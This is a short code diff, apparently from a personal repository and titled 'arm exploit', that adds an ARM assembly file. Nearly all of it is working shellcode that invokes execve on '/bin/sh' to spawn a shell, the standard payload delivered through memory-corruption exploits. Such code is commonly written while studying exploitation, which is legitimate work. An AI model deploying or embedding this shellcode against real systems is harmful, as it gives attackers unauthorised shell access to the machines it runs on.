손지언

arm exploit

1 +.section .text
2 +.global _start
3 +
4 +_start:
5 + add r0, pc, #12
6 + mov r1, #0
7 + mov r2, #0
8 + mov r7, #11
9 + svc #0
10 +
11 +.ascii "/bin/sh\0"
...\ No newline at end of file ...\ No newline at end of file